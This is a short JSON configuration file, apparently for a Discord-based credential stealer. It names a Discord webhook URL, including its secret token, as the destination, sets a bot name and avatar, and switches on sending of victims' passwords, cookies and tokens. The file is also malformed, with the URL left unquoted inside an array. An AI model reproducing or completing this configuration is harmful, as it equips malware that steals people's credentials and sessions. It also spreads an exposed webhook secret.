{
    "Title_Configs":[
        {

           "name": "Frank",
           "servername": "frank562",
           "program": "frank562"

        }
    ],

    "Webhook_config":[https://discord.com/api/webhooks/1266936341195919433/MYdHAzv1maIlLITDslDCyNJ6_FjKSYDe3t8TSsiYQm9dr9hYoVgyS9q4LwHbYF7xwh7A
        {

          "Bot_Name": "Holaamiguitos",
          "Bot_Avatar": "https://media.discordapp.net/attachments/818904459681071126/1008774401648505013/goat6.jpg"
  
        }
    ],

    "Other_Configs":[
        {
          "SendPasswords": true,
          "SendCookie": true,
          "SendToken": true
        }
    ]


}
